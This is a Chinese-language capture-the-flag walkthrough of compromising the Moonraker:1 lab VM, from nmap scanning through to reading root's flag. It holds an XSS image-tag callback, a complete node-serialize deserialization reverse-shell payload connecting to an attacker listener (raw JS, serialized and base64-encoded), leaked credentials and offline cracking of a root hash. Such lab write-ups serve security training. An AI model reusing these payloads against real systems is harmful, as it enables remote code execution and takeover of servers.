0x01 前言
攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。
Moonraker: 1镜像下载地址:
http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA
0x02 信息收集
1.存活主机扫描
root@kali2018:/# arp-scan -l
发现192.168.1.10是目标靶机系统
2.端口扫描
namp扫描目标靶机端口
root@kali2018:~# nmap -p - -A 192.168.1.10 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) | 256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA) |_ 256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519) 80/tcp open httpApache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: MOONRAKER 3000/tcp open httpNode.js Express framework | http-auth: | HTTP/1.1 401 Unauthorizedx0D |_ Basic realm=401 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 4369/tcp open epmdErlang Port Mapper Daemon | epmd-info: | epmd_port: 4369 | nodes: |_ couchdb: 33681 5984/tcp open couchdb? | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Object Not Found | Cache-Control: must-revalidate | Connection: close | Content-Length: 58 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:55 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: bf092a958f | X-CouchDB-Body-Time: 0 | {"error":"not_found","reason":"Database does not exist."} | GetRequest: | HTTP/1.0 200 OK | Cache-Control: must-revalidate | Connection: close | Content-Length: 164 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:02 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: f038a56575 | X-CouchDB-Body-Time: 0 |{"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}} | HTTPOptions: | HTTP/1.0 500 Internal Server Error | Cache-Control: must-revalidate | Connection: close | Content-Length: 61 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:02 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: fdeb1a3860 | X-Couch-Stack-Hash: 1828508689 | X-CouchDB-Body-Time: 0 |_{"error":"unknown_error","reason":"badarg","ref":1828508689}
NMAP扫描输出显示开放端口服务:22(ssh),80(http),110(pop3),3000(node.js),4369(epmd),5984(couchdb)
3.目录扫描
我比较喜欢gobuster和DirBuster来进行目录扫描,这里我用gobuster进行目标目录扫描。
在扫描完成后,发现一个可疑的目录为/services
打开该目录的链接地址http://192.168.1.10/services/,可以在网页底部看到SEND AN INIRIRY的超级链接,然后打开超链接。
打开链接后显示了一个售后联系信息页面。注意到有人会查询我们提交的信息,并会在5分钟内与我们联系。
这里我们使用<img>标签嵌套了我的远程服务网站地址。(只要对方访问了该嵌套xss,远端服务器的日志就会被记录访问请求日志记录)
apache启动
在提交信息前,启动apache服务,并在/var/www/html目录下新建一个测试文件test.txt,内容随便写一个。
root@kali2018:~# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service. root@kali2018:~# cd /var/www root@kali2018:/var/www# ls html root@kali2018:/var/www# cd html/ root@kali2018:/var/www/html# ls index.html index.nginx-debian.html root@kali2018:/var/www/html# vi test.txt root@kali2018:/var/www/html#
测试apache服务器能正常访问
随后可以通过apache2 access.log可以查看到访问目标靶机网站日志记录。点击提交后,它已显示感谢您的提交消息,如下图所示。
通过命令查看apache访问日志
tail -f /var/log/apache2/access.log
可以发现日志中有一个有趣的http refefer地址:http://192.168.1.10/svc-inq/salesmoon-gui.php
0x03 漏洞利用
1.CouchDB信息收集
我们在浏览器中打开http refefer请求地址
然后显示出"返回销售管理后台"的超链接,点击可进入到销售后台管理登录页面。
接下来我们点击CouchDB Notes并得到一些关于用户名的密码的提示:
用户名:jaws ,密码:jaws女友名字+ x99
在这里,我们谷歌搜索Jaws' girlfriend
已获取到Fauxton系统中Apache CouchDB的用户名和密码。要了解有关Fauxton和CouchDB的更多信息,我们可以通过googel搜索它们的使用方法(http://docs.couchdb.org/en/stable/fauxton/install.html).
2.CouchDB登录及信息泄露
由于端口5984是开放的。可以打开CouchDB登录页面(192.168.1.10:5984/_utils/).
这里我们使用了Login Credentials,如下所示:
Username: jaws
Password: dollyx99
已成功登录,现在让我们查看这3个数据库中的信息。
该links数据库暴露出更多的信息
查看该链接数据库中的文档,因为每个文档都包含目录链接,但第三个目录链接可能会为我们的下一步渗透提供有用的信息。
因此,我们打开第三个文档的连接,并查看到有用的连接目录信息。
所以上面的链接,在打开后显示出一个人事办公备忘记录的信息(这里记录几个人的重要邮件信息)
可以看到邮件中泄露了用户名和密码
3.Node.js反序列化
这里打开http://192.168.1.10/raker-sales/后台管理页面,发现“hugo's page moved to port 3k”页面是有趣的(结合上面人事备忘记录页面中的hugo邮件信息)
打开该链接后,可看到有关node.js服务器和访问的信息
用户名和密码在Hugo的HR邮件中http://192.168.1.10/HR-Confidential/offer-letters.html
显示出登录node.js的用户名和密码(通过3000端口访问)
登录后,node.js服务器会发送“Set-Cookie”信息。
Node.js反序列化漏洞相关信息可以参考该链接地址。
4.反序化漏洞利用
从NMAP Scan输出,我们知道端口3000是Node.js框架应用。因此,我们在浏览器上打开目标IP的3000端口应用并弹出登录用户界面。
Username: hugo
Password: TempleLasersL2K
成功登录后,我们会在页面中显示一条消息。这个页面似乎毫无用处,但在花时间搞清楚下一步该做什么后,它变得非常有趣。
启动F12查看页面的请求信息。在Cookie中看到了base64编码信息。这里我们将以base64编码形式插入node.js反序列化漏洞。
使用msfvenom生成nodejs反弹shell
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21 LPORT=1234
从终端输出msfvenom到rce.js
rce.js:
var rev = { rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); } }; var serialize = require('node-serialize'); console.log(serialize.serialize(rev));
运行node rce.js以获取序列化字符串输出。
root@kali2018:/opt# node rce.js {"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}
接下来,将IIFE括号()添加到上一步的序列化字符串输出的末尾
{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}
然后将其转换成base64编码
eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=
先登录node.js后台,然后再刷新页面,通过bupsuit进行拦截,将整个base64字符串设置为cookie中profile的值,替换完profile值后进行拦截提交,在者之前,您需要设置您的nc侦听。
现在,我们在攻击机上监听netcat,然后通过python脚本进入交互shell界面:python -c 'import pty; pty.spawn("/bin/bash")'
root@kali2018:/opt# nc -lvvp 1234 listening on [any] 1234 ... 192.168.1.10: inverse host lookup failed: Unknown host connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010 id uid=1001(jaws) gid=1001(jaws) groups=1001(jaws) python -c "import pty;pty.spawn('/bin/bash')" jaws@moonraker:/$
0x04 权限提升
在枚举jaws帐户期间,我注意到Postfix正在本地监听25端口。
netstat -ano
我们进入目录/var/mial中发现了四个邮箱账号信息,但没有权限访问它们。
jaws@moonraker:~$ cd /var/mai jaws@moonraker:/var/mail$ ls -al total 96 drwxrwsr-x 2 root mail4096 Oct 14 10:25 . drwxr-xr-x 12 root root 4096 Sep 20 17:38 .. -rw------- 1 hugo mail2994 Oct 6 11:47 hugo -rw------- 1 moonrakertech mail 1478 Oct5 19:24 moonrakertech -rw------- 1 root mail 68975 Oct 6 11:40 root -rw------- 1 sales mail6342 Oct 14 10:25 sales
在了解了CouchDb的配置之后,我们发现CouchDb的默认安装目录是/opt/couchdb,从/etc/local.ini读取配置文件。
让我们查看local.ini中的配置内容
jaws@moonraker:/var/mail$tail /opt/couchdb/etc/local.ini Username: hugo Password: 321Blast0ff!! eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDUwLDU1LDQ2LDQ4LDQ2LDQ4LDQ2LDQ5LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUwLDUxLDUxLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==
有了hugo密码,我登录他的帐户并阅读他的邮件。
jaws@moonraker:/var/mail$ su hugo Password: 321Blast0ff! Mail version 8.1.2 01/15/2001. Type ? for help.
登录hugo用户后,然后读取了其邮件信息,我们注意到Message 2很有趣,因为它包含root和哈希密码,并且还告诉我们该密码也在VROOM系统中使用。
jaws@moonraker:/var/mail$ mail "/var/mail/hugo": 3 messages 3 new >N 1 moonrakertech@moo Fri Oct5 19:11 17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident &
这里我们读取邮件2的信息
>N 1 moonrakertech@moo Fri Oct5 19:11 17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident & 2 Message 2: From moonrakertech@moonraker.localdomainFri Oct 5 19:39:51 2018 X-Original-To: hugo@moonraker.localdomain To: hugo@moonraker.localdomain Subject: RE:RE:RE:Root Access MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT) From: moonrakertech@moonraker.localdomain Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk. Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes. Have fun with the decryption process "Boss"! Haha! root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::
这里显示了root以及对应旧密码的hash值
让我们复制旧密码哈希并通过John the Ripper进行离线破解
john root.hash
Username: root
Password: cyber
最终新的登录密码为:cyber+VR00M(cyberVR00M)
使用root身份登录系统。
su root Password: cyberVR00M hugo@moonraker:/var/mail$ su root Password: cyberVR00M
0X05 flag信息查看
成功以root身份登录,在检查其邮件目录时,我们找到了flag.txt文件。
root@moonraker:~# cd /root root@moonraker:~# ls coreDesktop Downloads flag.txt root@moonraker:~# cat flag.txt
